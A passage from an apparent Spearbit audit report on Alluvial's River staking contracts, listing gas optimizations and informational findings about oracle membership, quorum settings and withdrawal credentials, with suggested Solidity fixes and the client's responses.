for (; idx < length;) {

Alluvial: Resolved in SPEARBIT/14.

Spearbit: Acknowledged.

+6.5.10 Cache the r.value.length - 1 value to avoid reading from storage multiple times

Severity: Gas Optimization

Context: Operators.sol#L261-L264

Description/Recommendation: We can cache the r.value.length - 1 value to avoid reading from storage twice and also performing the same arithmetic operation twice.

testExecutorCanSetOperatorLimit() (gas: -156 (-0.000%))
testGovernorCanSetOperatorLimit() (gas: -156 (-0.000%))
testMakingFunctionGovernorOnly() (gas: -156 (-0.001%))
testRandomCallerCannotSetOperatorLimit() (gas: -156 (-0.001%))
testRandomCallerCannotSetOperatorStatus() (gas: -156 (-0.001%))
testRandomCallerCannotSetOperatorStoppedValidatorCount() (gas: -156 (-0.001%))
testExecutorCanSetOperatorStoppedValidatorCount() (gas: -156 (-0.001%))
testGovernorCanSetOperatorStatus() (gas: -156 (-0.001%))
testGovernorCanSetOperatorStoppedValidatorCount() (gas: -156 (-0.001%))
testGovernorCanAddOperator() (gas: -156 (-0.001%))
testExecutorCanSetOperatorStatus() (gas: -156 (-0.001%))
Overall gas change: -1716 (-0.007%)

if (!opExists) {
    r.value.push(newValue);
    uint256 index = r.value.length - 1;
    _setOperatorIndex(name, newValue.active, index);
    return index;

Alluvial: Issue does not exist anymore given that the referenced code has been removed in SPEARBIT/14.

Spearbit: Acknowledged.

+6.5.11 Caching activeCount in Operators.sol::getAllActive/getAllFundable to storage to save gas

Severity: Gas Optimization

Context: Operators.sol#L165-L176, Operators.sol#L205-L216

Description/Recommendation: activeCount can be made into a storage variable that gets updated whenever an operator becomes active or inactive. This way we can avoid the expensive loops (1, 2) that calculate activeCount on each call to getAllActive() or getAllFundable(). Note that for the loop in getAllFundable(), we need to store a slightly modified version in storage and call that activeFundableCount. These extra loops are only needed because we need to plug the count into the definition of the variables below:

// getAllActive()
Operator[] memory activeOperators = new Operator[](activeCount);

// getAllFundable()
CachedOperator[] memory activeOperators = new CachedOperator[](activeCount);
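A minimal sketch of the bookkeeping, with ActiveOperatorsCount as an illustrative storage library in the style of the project's other unstructured-storage slots:

// update the counter wherever an operator's active flag flips
function _setOperatorActive(uint256 _index, bool _active) internal {
    Operators.Operator storage operator = Operators.getByIndex(_index);
    if (operator.active != _active) {
        uint256 count = ActiveOperatorsCount.get(); // hypothetical storage slot
        ActiveOperatorsCount.set(_active ? count + 1 : count - 1);
        operator.active = _active;
    }
}

// getAllActive() can then size its result without the counting loop
Operator[] memory activeOperators = new Operator[](ActiveOperatorsCount.get());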
Alluvial: Acknowledged.

+6.5.12 Rewrite the for loop in ValidatorKeys.sol::getKeys to save gas

Severity: Gas Optimization

Context: ValidatorKeys.sol#L54-L60

Description/Recommendation: We can rewrite the for loop in ValidatorKeys.sol::getKeys to move/cache some variables to save gas.

testUserDepositsOperatorWithStoppedValiadtors() (gas: -3614 (-0.002%))
testUserDepositsForAnotherUser() (gas: -4078 (-0.002%))
testDeniedUser() (gas: -4078 (-0.002%))
testELFeeRecipientPullFunds() (gas: -4078 (-0.002%))
testUserDeposits() (gas: -4078 (-0.002%))
testNoELFeeRecipient() (gas: -4078 (-0.002%))
testUserDepositsTenPercentFee() (gas: -4078 (-0.002%))
testUserDepositsFullAllowance() (gas: -4078 (-0.002%))
testUserDepositsUnconventionalDeposits() (gas: -4145 (-0.002%))
testValidatorsPenaltiesEqualToExecLayerFees() (gas: -4078 (-0.002%))
testValidatorsPenalties() (gas: -4078 (-0.002%))
Overall gas change: -44461 (-0.019%)

uint256 idx;
for (; idx < amount;) {
    bytes memory rawCredentials = r.value[operatorIndex][idx + startIdx];
    publicKey[idx] = BytesLib.slice(rawCredentials, 0, PUBLIC_KEY_LENGTH);
    signatures[idx] = BytesLib.slice(rawCredentials, PUBLIC_KEY_LENGTH, SIGNATURE_LENGTH);
    unchecked {
        ++idx;
    }
}

Alluvial: Resolved in SPEARBIT/24.

Spearbit: Acknowledged.

+6.5.13 Operators.get in _getNextValidatorsFromActiveOperators can be replaced by Operators.getByIndex to avoid extra operations/gas

Severity: Gas Optimization

Context: OperatorsRegistry.1.sol#L436

Description: Operators.get in _getNextValidatorsFromActiveOperators performs multiple checks that have already been done when Operators.getAllFundable() was called. This includes finding the index and checking whether OperatorResolution.active is set. These are all unnecessary.

Recommendation: Replace Line 436 in _getNextValidatorsFromActiveOperators with:

Operators.Operator storage operator = Operators.getByIndex(operators[selectedOperatorIndex].index);

testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: -2 (-0.000%))
testRemoveValidatorsAsAdmin(bytes32,uint256,uint256) (gas: -7 (-0.000%))
testBalanceOfEditsMultiBurnsMultiUserAndRebase(uint256,uint256) (gas: 2 (0.000%))
testBalanceOfEdits(uint256,uint32) (gas: 2 (0.000%))
testTotalSupplyEdits(uint256,uint32) (gas: 2 (0.000%))
testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: 2 (0.000%))
testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: -5 (-0.000%))
testBurnWrappedTokens(uint256,uint32) (gas: 8 (0.000%))
testTransferFrom(uint256,uint256,uint256,uint32) (gas: 29 (0.000%))
testTransfer(uint256,uint256,uint32) (gas: -24 (-0.000%))
testGetKeysAsRiver(bytes32,uint256,uint256) (gas: -922 (-0.001%))
testGetKeysAsRiverLimitTest(bytes32,uint256,uint256) (gas: -922 (-0.001%))
testUserDepositsForAnotherUser() (gas: -1872 (-0.001%))
testDeniedUser() (gas: -1872 (-0.001%))
testELFeeRecipientPullFunds() (gas: -1872 (-0.001%))
testUserDeposits() (gas: -1872 (-0.001%))
testNoELFeeRecipient() (gas: -1872 (-0.001%))
testUserDepositsTenPercentFee() (gas: -1872 (-0.001%))
testUserDepositsFullAllowance() (gas: -1872 (-0.001%))
testValidatorsPenaltiesEqualToExecLayerFees() (gas: -1872 (-0.001%))
testValidatorsPenalties() (gas: -1872 (-0.001%))
testRiverFuzzing(uint96,uint96,uint32) (gas: -1872 (-0.001%))
testUserDepositsOperatorWithStoppedValiadtors() (gas: -1872 (-0.001%))
testUserDepositsUnconventionalDeposits() (gas: -2808 (-0.001%))
testBreakingLowerBoundLimit(uint64,uint64,uint32) (gas: -19196 (-0.078%))
Overall gas change: -44433 (-0.090%)

Also note: if we apply this change, we can go further and cache the value of operators[selectedOperatorIndex].index, since it is also used in the if/else block immediately after it.

Alluvial: Recommendation implemented in SPEARBIT/14.

Spearbit: Acknowledged.
+6.5.14 Avoid unnecessary equality checks with true in if statements

Severity: Gas Optimization

Context: OperatorsRegistry.1.sol#L197

Description: Statements of the type if (condition == true) can be replaced with if (condition). The extra comparison with true is redundant.

Recommendation: So Line 197 in OperatorsRegistry can be changed to:

if (Operators.exists(_newName)) {

Alluvial: We completely removed the name unicity and are now working entirely with indexes as unique identifiers. Names are considered informational off-chain data now. The check has been removed in SPEARBIT/14.

Spearbit: Acknowledged.

+6.5.15 Rewrite OperatorRegistry.getOperatorDetails to save gas

Severity: Gas Optimization

Context: OperatorsRegistry.1.sol#L130

Description: In getOperatorDetails the 1st line is:

_index = Operators.indexOf(_name);

Since we already have the _index from this line, we can use it along with getByIndex to retrieve the _operatorAddress. This would reduce the gas cost significantly, since Operators.get(_name) calls Operators._getOperatorIndex(name) to find the _index again.

testExecutorCanSetOperatorLimit() (gas: -1086 (-0.001%))
testGovernorCanSetOperatorLimit() (gas: -1086 (-0.001%))
testUserDepositsForAnotherUser() (gas: -2172 (-0.001%))
testDeniedUser() (gas: -2172 (-0.001%))
testELFeeRecipientPullFunds() (gas: -2172 (-0.001%))
testUserDepositsUnconventionalDeposits() (gas: -2172 (-0.001%))
testUserDeposits() (gas: -2172 (-0.001%))
testNoELFeeRecipient() (gas: -2172 (-0.001%))
testUserDepositsTenPercentFee() (gas: -2172 (-0.001%))
testUserDepositsFullAllowance() (gas: -2172 (-0.001%))
testValidatorsPenaltiesEqualToExecLayerFees() (gas: -2172 (-0.001%))
testValidatorsPenalties() (gas: -2172 (-0.001%))
testUserDepositsOperatorWithStoppedValiadtors() (gas: -3258 (-0.002%))
testMakingFunctionGovernorOnly() (gas: -1086 (-0.005%))
testRandomCallerCannotSetOperatorLimit() (gas: -1086 (-0.005%))
testRandomCallerCannotSetOperatorStatus() (gas: -1086 (-0.005%))
testRandomCallerCannotSetOperatorStoppedValidatorCount() (gas: -1086 (-0.005%))
testExecutorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%))
testGovernorCanSetOperatorStatus() (gas: -1086 (-0.006%))
testGovernorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%))
testGovernorCanAddOperator() (gas: -1086 (-0.006%))
testExecutorCanSetOperatorStatus() (gas: -1086 (-0.006%))
Overall gas change: -36924 (-0.062%)

Also note: when the operator is not OperatorResolution.active, _index becomes -1 in both cases. With the suggested change, if _index is -1 then uint256(_index) == type(uint256).max, which would cause getByIndex to revert with OperatorNotFoundAtIndex(index). With the current code, it reverts with an index out-of-bounds type of error instead.

Recommendation: Consider implementing the following change.

- _operatorAddress = Operators.get(_name).operator;
+ _operatorAddress = Operators.getByIndex(uint256(_index)).operator;

Alluvial: Issue does not exist anymore given that the referenced code has been removed by PR SPEARBIT/14.

Spearbit: Acknowledged.
+6.5.16 Rewrite/simplify OracleV1.isMember to save gas

Severity: Gas Optimization

Context: Oracle.1.sol#L189-L200

Description: OracleV1.isMember can be simplified to save gas.

Recommendation: Rewrite isMember as:

function isMember(address _memberAddress) external view returns (bool) {
    return OracleMembers.indexOf(_memberAddress) >= 0;
}

testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: -21 (-0.000%))
testRemoveValidatorsAsAdmin(bytes32,uint256,uint256) (gas: -22 (-0.000%))
testBalanceOfEdits(uint256,uint32) (gas: 2 (0.000%))
testBurnWrappedTokensWithRebase(uint256,uint32) (gas: -2 (-0.000%))
testTotalSupplyEdits(uint256,uint32) (gas: 2 (0.000%))
testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: -2 (-0.000%))
testBurnWrappedTokens(uint256,uint32) (gas: 3 (0.000%))
testTransfer(uint256,uint256,uint32) (gas: -5 (-0.000%))
testTransferFrom(uint256,uint256,uint256,uint32) (gas: 12 (0.000%))
testBalanceOfEditsMultiBurnsMultiUserAndRebase(uint256,uint256) (gas: 21 (0.000%))
testBalanceOfEditsMultiBurnsAndRebase(uint256) (gas: -24 (-0.000%))
testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: -36 (-0.000%))
testRandomCallerCannotRemoveMember() (gas: -121 (-0.001%))
testExecutorCanAddMember() (gas: -121 (-0.002%))
testGovernorCanAddMember() (gas: -121 (-0.002%))
testRemoveMemberUnauthorized(uint256) (gas: -233 (-0.002%))
testAddMember(uint256) (gas: -233 (-0.002%))
testRemoveMember(uint256) (gas: -288 (-0.003%))
testExecutorCanRemoveMember() (gas: -187 (-0.003%))
testGovernorCanRemoveMember() (gas: -187 (-0.003%))
Overall gas change: -1563 (-0.017%)

Alluvial: Recommendation implemented in SPEARBIT/20.

Spearbit: Acknowledged.

+6.5.17 Cache the beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch multiplication to save gas

Severity: Gas Optimization

Context: Oracle.1.sol#L167-L168

Description: The calculation of _startTime and _endTime uses more multiplications than necessary.

Recommendation: Cache the multiplication beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch to save gas.

uint256 secondsPerEpoch = beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch;
_startTime = beaconSpec.genesisTime + _startEpochId * secondsPerEpoch;
_endTime = _startTime + secondsPerEpoch * beaconSpec.epochsPerFrame - 1;

testRemoveValidatorsAsOperator(bytes32,uint256,uint256) (gas: -2 (-0.000%))
testBalanceOfEdits(uint256,uint32) (gas: 2 (0.000%))
testBurnWrappedTokensWithRebase(uint256,uint32) (gas: -2 (-0.000%))
testTotalSupplyEdits(uint256,uint32) (gas: 2 (0.000%))
testBurnWrappedTokensInvalidTransfer(uint256,uint32) (gas: -2 (-0.000%))
testBurnWrappedTokens(uint256,uint32) (gas: 3 (0.000%))
testBalanceOfEditsMultiBurnsAndRebase(uint256) (gas: -5 (-0.000%))
testTransferFrom(uint256,uint256,uint256,uint32) (gas: 10 (0.000%))
testRemoveMember(uint256) (gas: -7 (-0.000%))
testTotalSupplyEditsMultiBurnsAndRebase(uint256) (gas: -17 (-0.000%))
testUserDepositsForAnotherUser() (gas: -166 (-0.000%))
testDeniedUser() (gas: -166 (-0.000%))
testELFeeRecipientPullFunds() (gas: -166 (-0.000%))
testUserDepositsUnconventionalDeposits() (gas: -166 (-0.000%))
testUserDeposits() (gas: -166 (-0.000%))
testNoELFeeRecipient() (gas: -166 (-0.000%))
testUserDepositsTenPercentFee() (gas: -166 (-0.000%))
testUserDepositsFullAllowance() (gas: -166 (-0.000%))
testValidatorsPenaltiesEqualToExecLayerFees() (gas: -166 (-0.000%))
testValidatorsPenalties() (gas: -166 (-0.000%))
testRiverFuzzing(uint96,uint96,uint32) (gas: -166 (-0.000%))
testUserDepositsOperatorWithStoppedValiadtors() (gas: -166 (-0.000%))
testTransfer(uint256,uint256,uint32) (gas: -24 (-0.000%))
Overall gas change: -2034 (-0.001%)

Alluvial: Recommendation implemented in SPEARBIT/20.

Spearbit: Acknowledged.
+6.5.18 Avoid wasting gas distributing rewards when the number of shares to be distributed is zero

Severity: Gas Optimization

Context: River.1.sol#L263-L280

Description: _onEarnings calculates and distributes shares to both operators and the treasury. During the audit, the client stated that both GlobalFee and OperatorRewardsShare, used to calculate the number of shares to be distributed to operators and the treasury, could range from 0 to BASE. This means that there are scenarios where:
• sharesToMint could be 0 (total number of shares to be distributed to operators and treasury).
• operatorRewards could be 0 (number of shares to be distributed to operators).
• sharesToMint - mintedRewards could be 0 (number of shares to be distributed to the treasury).
In those scenarios, all the gas spent in calculations and the event emitted by calling _mintRawShares could be avoided.
Note: if GlobalFee or OperatorRewardsShare is 0, the number of shares distributed to the operators as a reward for providing the validator infrastructure would be zero.
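A minimal sketch of the guards inside _onEarnings; sharesToMint, operatorRewards and mintedRewards are the quantities named above (their computation is elided), and TreasuryAddress is an illustrative storage slot:

if (sharesToMint == 0) {
    return; // nothing to distribute: skip both mints and their Transfer events
}
uint256 mintedRewards = 0;
if (operatorRewards > 0) {
    mintedRewards = _rewardOperators(operatorRewards);
}
if (sharesToMint - mintedRewards > 0) {
    _mintRawShares(TreasuryAddress.get(), sharesToMint - mintedRewards);
}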
Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. Now shares are distributed to the treasury only if sharesToMint > 0.

Spearbit: Acknowledged.

+6.5.19 _rewardOperators could save gas by skipping operators with no active and funded validators

Severity: Gas Optimization

Context: River.1.sol#L219-L248

Description: _rewardOperators is the River function that distributes the earned rewards to each active operator based on their number of active validators. The function iterates over the list of active operators returned by OperatorsRegistryV1.listActiveOperators, calculating the total number of active and funded validators (funded - stopped) and the number of active and funded validators (funded - stopped) for each operator. Because of the current code, the final temporary array validatorCounts could contain items equal to 0 where the operator at that index position has no more active validators. This means that:
1) gas has been wasted during the loop,
2) gas will be wasted in the second loop, distributing 0 shares to an operator without active and funded validators,
3) _mintRawShares will be executed without minting any shares, but still emitting a Transfer event.

Recommendation: Consider making listActiveOperators return only operators that have at least one active and funded validator (funded - stopped > 0). Consider also preventing calls to _mintRawShares when the number of shares to be minted is 0.

Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8.

Spearbit: Acknowledged.

6.6 Informational

+6.6.1 Consider adding a strict check to prevent the Oracle admin from adding more than 256 members

Severity: Informational

Context: Oracle.1.sol#L202-L211, OracleMembers.sol#L23-L33

Description: At the time of writing this issue, at the latest commit 030b52feb5af2dd2ad23da0d512c5b0e55eb8259, the natspec docs of OracleMembers contain a @dev comment that says: "There can only be up to 256 oracle members. This is due to how report statuses are stored in Reports Positions". If we look at ReportsPositions.sol, the natspec docs explain that "Each bit in the stored uint256 value tells if the member at a given index has reported". But neither Oracle.addMember nor OracleMembers.push prevents the admin from adding more than 256 items to the list of oracle members. If we look at the result of the test (located in the Appendix), we can see that:
• It's possible to add more than 256 oracle members.
• oracle.getMemberReportStatus(oracleMember257) returns true even if the oracle member has not reported yet.
• Because of that, oracle.reportConsensusLayerData (executed by oracleMember257) correctly reverts.
• If we remove a member from the list (for example the oracle member with index 1), oracleMember257 will be able to vote, because it will be swapped with the removed member, and at this point oracle.getMemberReportStatus(oracleMember257) returns false.

Recommendation: Consider adding a strict check inside Oracle.addMember that prevents the Oracle admin from adding more than 256 oracle members.
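A minimal sketch of the check; the member-list accessor and the error name are illustrative:

uint256 internal constant MAX_ORACLE_MEMBERS = 256; // one bit per member in the ReportsPositions bitmap

function addMember(address _newOracleMember) external onlyAdmin {
    if (OracleMembers.get().length >= MAX_ORACLE_MEMBERS) { // assumed list accessor
        revert TooManyMembers(MAX_ORACLE_MEMBERS); // hypothetical error
    }
    OracleMembers.push(_newOracleMember);
    // ...
}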
Alluvial: This issue has been acknowledged, as we would never have such a big oracle member count, and if we ever needed it we would update the Oracle contract to make the report voting scale above 256 members.

+6.6.2 ApprovalsPerOwner.set does not check if owner or spender is address(0)

Severity: Informational

Context: ApprovalsPerOwner.sol#L24-L34

Description: When the ApprovalsPerOwner value is set for an owner and a spender, the addresses of the owner and the spender are not checked against address(0).

Recommendation: Add checks for owner and spender to make sure they are not passed as the zero address by mistake. Other libraries like OpenZeppelin have a similar check.

Alluvial: The following PR has introduced checks for the mentioned addresses that are fed to ApprovalsPerOwner. So although the checks are not inside the library, they have been applied before using the library's setter function.

Spearbit: Acknowledged.

+6.6.3 Quorum could be higher than the number of oracles, DOSing the Oracle contract

Severity: Informational

Context: Oracle.1.sol#L257-L282

Description: The current implementation of Oracle.setQuorum only checks that the _newQuorum input parameter is not 0 and not equal to the current quorum value. By setting a quorum higher than the number of oracle members, no quorum could be reached for the current or future slots.

Recommendation: Consider adding a check that reverts the transaction if the value of _newQuorum is greater than the number of oracle members.
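A minimal sketch of the extra check inside setQuorum; the member-count accessor and the error name are illustrative:

function setQuorum(uint256 _newQuorum) external onlyAdmin {
    uint256 memberCount = OracleMembers.get().length; // assumed list accessor
    if (_newQuorum == 0 || _newQuorum > memberCount) {
        revert InvalidQuorum(_newQuorum, memberCount); // hypothetical error
    }
    // ... existing same-value check and storage update ...
}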
Alluvial: Recommendation implemented in PR SPEARBIT/15.

Spearbit: Acknowledged. One important thing to remember: when the other PR about removeMember is merged with this one, the part that resets everything about the report for the epoch must be done before _setQuorum, otherwise the function will push a quorum that includes the report from the user that will be deleted.

Alluvial: Acknowledged.

+6.6.4 ConsensusLayerDepositManager.depositToConsensusLayer should be called only after a quorum has been reached to avoid rewarding validators that have not performed during the frame

Severity: Informational

Context: ConsensusLayerDepositManager.1.sol#L50

Description: Alluvial is not tracking timestamps or additional information about some actions that happen on-chain, like:
• when an operator's validator is funded on the beacon chain.
• when an operator is added.
• when validators are added or removed.
• when a quorum is reached.
• when rewards/penalties/slashes happen, and which validator is involved.
• and so on...
Without this enriched information, it could happen that validators that have not contributed to a frame still get rewards, which could be unfair to the other validators that have contributed to the overall balance by working and bringing rewards. Let's make an example: we have 10 operators with 1k validators each at the start of a frame. At some point, at the very end of the frame, operator_10 gets 9k validators approved and all of them get funded. Those validators participated in only a small fraction of the production of the rewards. But because there is no way to track this timing, and because the oracles know nothing about it (they just need to report the balance and the number of validators during the frame), they will report and arrive at a quorum of reportBeacon(correctEpoch, correctAmountOfBalance, 21_000), which will trigger OracleManagerV1.setBeaconData. The contract check that 21_000 > DepositedValidatorCount.get() will pass, and _onEarnings is called. Leaving aside the math involved in calculating the number of shares to be distributed based on the staked balance delta, let's say that because of all the increase in capital Alluvial will call _rewardOperators(1_000_000), distributing 1_000_000 shares to operators based on the number of validators that produced that reward. Because, as we said, we do not know how much each validator has contributed, those shares will be distributed in the same way to operators that may not have contributed at all to the epoch. This is true in both scenarios, where validators join or exit the beacon chain after the start of the epoch at which the last quorum was set.

Recommendation: If adding this information and the logic to better track these behaviors on-chain is problematic, consider at least documenting all these possible scenarios to let each actor in Alluvial be aware of them.

Alluvial: The whole operator rewarding system has been removed in PR SPEARBIT/8. There's going to be a contract receiving the rewards (treasury) from which we'll pay the operators. To begin with, we'll probably not do a performance-based distribution to keep it simple, but this is something we can add in the future as the rewards are computed off-chain.

Spearbit: Acknowledged.

+6.6.5 Document the decision to include executionLayerFees in the logic that triggers _onEarnings to distribute rewards to operators and treasury

Severity: Informational

Context: OracleManager.1.sol#L40-L68

Description: The setBeaconData function of the OracleManager contract is called when oracle members have reached a quorum. After checking that the report data passes some integrity checks, the function checks whether rewards should be distributed to operators and the treasury:

uint256 executionLayerFees = _pullELFees();
if (previousValidatorBalanceSum < _validatorBalanceSum + executionLayerFees) {
    _onEarnings((_validatorBalanceSum + executionLayerFees) - previousValidatorBalanceSum);
}

The delta between _validatorBalanceSum and previousValidatorBalanceSum is the sum of all the rewards, penalties and slashes that validators have accumulated during the validation work of one or multiple frames. By adding executionLayerFees to the check, even if the validators have performed poorly (the sum of rewards is less than the sum of penalties + slashes) they could still get rewards if executionLayerFees is greater than the negative delta of newSum - prevSum. If we look at the natspec of _onEarnings, it seems that only the validators' balance (without fees) should be used in the if check.

/// @notice Handler called if the delta between the last and new validator balance sum is positive
/// @dev Must be overriden
/// @param _profits The positive increase in the validator balance sum (staking rewards)
function _onEarnings(uint256 _profits) internal virtual;

Recommendation: If the current logic is correct, consider updating the natspec comments and further explaining the logic and the decisions made, to remove any possible doubts.

Alluvial: The whole operator rewarding system has been removed by PR SPEARBIT/8. Regarding using executionLayerFees in the _onEarnings trigger check: the whole process has been revamped by adding a maximum amount that we can pull. Basically, the Oracle will compute the maximum allowed increase in balance and give that to the River contract, which will be able to pull funds up to the allowed limit. The flow will be documented in the doc PR, but basically we consider EL fees a core revenue stream on which operators and the treasury can take a fee.

Spearbit: Acknowledged.

+6.6.6 Consider documenting how and if funds from the execution layer fee recipient are considered inside the annualAprUpperBound and relativeLowerBound boundaries

Severity: Informational

Context: BeaconReportBounds.sol#L6-L9, Oracle.1.sol#L423-L451, Oracle.1.sol#L468-L475

Description: When oracle members reach a quorum, the _pushToRiver function is called. Alluvial performs some sanity checks to prevent a malicious oracle member from reporting malicious beacon data. Inside the function:

uint256 prevTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply();
riverAddress.setBeaconData(_validatorCount, _balanceSum, bytes32(_epochId));
uint256 postTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply();
uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beaconSpec.slotsPerEpoch * _beaconSpec.secondsPerSlot;
_sanityChecks(postTotalEth, prevTotalEth, timeElapsed);

function _sanityChecks(uint256 _postTotalEth, uint256 _prevTotalEth, uint256 _timeElapsed) internal view {
    if (_postTotalEth >= _prevTotalEth) {
        uint256 annualAprUpperBound = BeaconReportBounds.get().annualAprUpperBound;
        if (
            uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth)
                > annualAprUpperBound * _prevTotalEth * _timeElapsed
        ) {
            revert BeaconBalanceIncreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, annualAprUpperBound);
        }
    } else {
        uint256 relativeLowerBound = BeaconReportBounds.get().relativeLowerBound;
        if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) {
            revert BeaconBalanceDecreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, relativeLowerBound);
        }
    }
}

Both prevTotalEth and postTotalEth call SharesManager.totalUnderlyingSupply(), which returns the value from River._assetBalance(). That balance also includes the amount of fees pulled from the ELFeeRecipient (execution layer fee recipient). Alluvial should document how and if funds from the execution layer fee recipient are also considered inside the annualAprUpperBound and relativeLowerBound boundaries.

Recommendation: Consider documenting how and if funds from the execution layer fee recipient are considered inside the annualAprUpperBound and relativeLowerBound boundaries.

Alluvial: Acknowledged.
+6.6.7 Allowlist.allow allows arbitrary values for the _statuses input

Severity: Informational

Context: Allowlist.1.sol#L46-L70

Description: The current implementation of allow does not check whether the value inside each _statuses item is valid. The function can be called by both the administrator and the allower (roles authorized to manage user permissions), who can assign arbitrary values to the corresponding _accounts item. The user permissions handled by Allowlist are then used by the River contract in different parts of the code. The permissions used inside the River contract are a limited set that might not match what the allower/admin of the Allowlist used to update a user's permission when the allow function was called.

Recommendation: Consider documenting which pool of values can be assigned to _statuses items, based on the checks done by the contracts that use the Allowlist contract. Otherwise, consider implementing a way to store "allowed" permission masks to be assigned to _statuses, and enforce an equality check inside the allow loop.
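A minimal sketch of the second option (an enforced set of recognized masks); the allowedMasks registry, the setter and the error are illustrative:

mapping(uint256 => bool) internal allowedMasks; // hypothetical registry managed by the admin

function allow(address[] calldata _accounts, uint256[] calldata _statuses) external {
    // ... existing admin/allower authorization and length checks ...
    for (uint256 idx = 0; idx < _accounts.length; ++idx) {
        if (!allowedMasks[_statuses[idx]]) {
            revert InvalidPermissionMask(_statuses[idx]); // hypothetical error
        }
        Allowlist.set(_accounts[idx], _statuses[idx]); // assumed setter, mirroring Allowlist.get
    }
}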
Alluvial: Acknowledged.

+6.6.8 Consider exploring a way to update the withdrawal credentials and document all the possible scenarios

Severity: Informational

Context:

Description: The withdrawal credentials are currently set when River.initRiverV1 is called. The function internally calls ConsensusLayerDepositManager.initConsensusLayerDepositManagerV1, which performs WithdrawalCredentials.set(_withdrawalCredentials). After initializing the withdrawal credentials, there is no way to update or change them. The withdrawal credentials are a key part of the whole protocol, and everything concerning them should be well documented, including all the worst-case scenarios:
• What if the withdrawal credentials are lost?
• What if the withdrawal credentials are compromised?
• What if the withdrawal credentials must be changed (lost, compromised, or simply the wrong ones have been submitted)? What should be implemented inside the Alluvial logic to use the new withdrawal credentials for the operators' validators that have not been funded yet (where the old withdrawal credentials have not been sent to the Deposit contract)?
Note that there currently seems to be no way to update the withdrawal credentials for a validator already submitted to the Deposit contract.

Recommendation:
• Consider documenting how Alluvial would handle all the scenarios where the withdrawal credentials have to be updated.
• Consider documenting how Alluvial plans to safeguard the withdrawal credentials.
• Consider implementing logic that allows Alluvial to update the withdrawal credentials on a time basis, or after X amount of ETH has been staked, to reduce the funds lost in case the key is lost or the key/contract is compromised.
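A minimal sketch of what an update hook under the last recommendation could look like; the admin modifier, the event and the bytes32 credentials type are illustrative, and it can only affect validators that have not been deposited yet:

// illustrative: rotate the credentials used for *future* deposits only;
// credentials of validators already submitted to the Deposit contract cannot change
function setWithdrawalCredentials(bytes32 _newWithdrawalCredentials) external onlyAdmin {
    WithdrawalCredentials.set(_newWithdrawalCredentials);
    emit SetWithdrawalCredentials(_newWithdrawalCredentials); // hypothetical event
}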
Alluvial: Acknowledged.

+6.6.9 Oracle contract allows members to skip frames and report them (even if they are past) one by one or all at once

Severity: Informational

Context: Oracle.1.sol#L284-L334

Description: The current implementation of reportBeacon allows oracle members to skip frames (255 epochs) and report them (even if they are past) one by one or all at once. Let's assume that members arrived at a quorum for epochId_X. When the quorum is reached, _pushToRiver is called, and it will update the following properties:
• clean all the storage used for member reporting.
• set ExpectedEpochId to epochId_X + 255.
• set LastEpochId to epochId_X.
With this context, let's assume that members decide to wait 30 frames (30 days), or that for 30 days they cannot arrive at a quorum. At that time the current epoch would be epochId_X + 255 * 30. The following scenarios can happen:
• 1) Report all the missed epochs at once. Instead of reporting only the current epoch (epochId_X + 255 * 30), they report all the previous "skipped" epochs that are in the past. In this scenario, ExpectedEpochId contains the number of the expected next epoch, assigned 30 days ago by the previous call to _pushToRiver. In reportBeacon, if _epochId is what the system expects (equal to ExpectedEpochId), the report can go on. So to be able to file all the missing reports of the "skipped" frames, the members just need to call, in sequence, reportBeacon(epochId_X + 255, ...), reportBeacon(epochId_X + 255 + 255, ...), ..., reportBeacon(epochId_X + 255 * 30, ...).
• 2) Report only the last epoch. In this scenario, they would call reportBeacon(epochId_X + 255 * 30, ...) directly. _pushToRiver calls _sanityChecks to perform checks such as not allowing changes in the amount of staked ether that are below or above some bounds. The call that would be made is _sanityChecks(oracleReportedStakedBalance, prevTotalEth, timeElapsed), where timeElapsed is calculated as uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beaconSpec.slotsPerEpoch * _beaconSpec.secondsPerSlot; So, the time elapsed is the number of seconds between the reported epoch and LastEpochId. But in this scenario, LastEpochId still holds the old value epochId_X from the previous call to _pushToRiver made 30 days ago. Because of this, the upper-bound check made inside _sanityChecks would be more relaxed, allowing a wider spread between oracleReportedStakedBalance and prevTotalEth.

Recommendation: Consider documenting these possible behaviors, or implement logic that prevents oracle members from calling reportBeacon for past epochs (relative to the real-time beacon epoch).

Alluvial: Acknowledged.

+6.6.10 Consider renaming OperatorResolution.active to a more meaningful name

Severity: Informational

Context: Operators.sol#L35

Description: The name active in the struct OperatorResolution could be misleading, because it can be confused with whether an operator is active (the struct containing the real operator information is Operator). The value of OperatorResolution.active does not represent whether an operator is active; it is used to know whether the index associated with the struct's item (OperatorResolution.index) is used or not.

Recommendation: Consider renaming it to something more meaningful for its usage in the code, to distinguish it from the operator's active state.

Alluvial: Issue does not exist anymore given that the referenced code has been removed in PR SPEARBIT/14.

Spearbit: Acknowledged.

+6.6.11 lsETH and wlsETH's name() functions return inconsistent names

Severity: Informational

Context: WLSETH.1.sol#L49, SharesManager.1.sol#L53

Description: lsETH.name() is "River Ether", while WlsETH.name() is "Wrapped Alluvial Ether".

Recommendation: Perhaps either "River" or "Alluvial" should be replaced by the other.

Alluvial: Recommendation implemented in SPEARBIT/18.

Spearbit: Acknowledged.

+6.6.12 Rename modifiers to have consistent naming and patterns only

Severity: Informational

Context: Firewall.sol#L42-L48, Firewall.sol#L50-L56

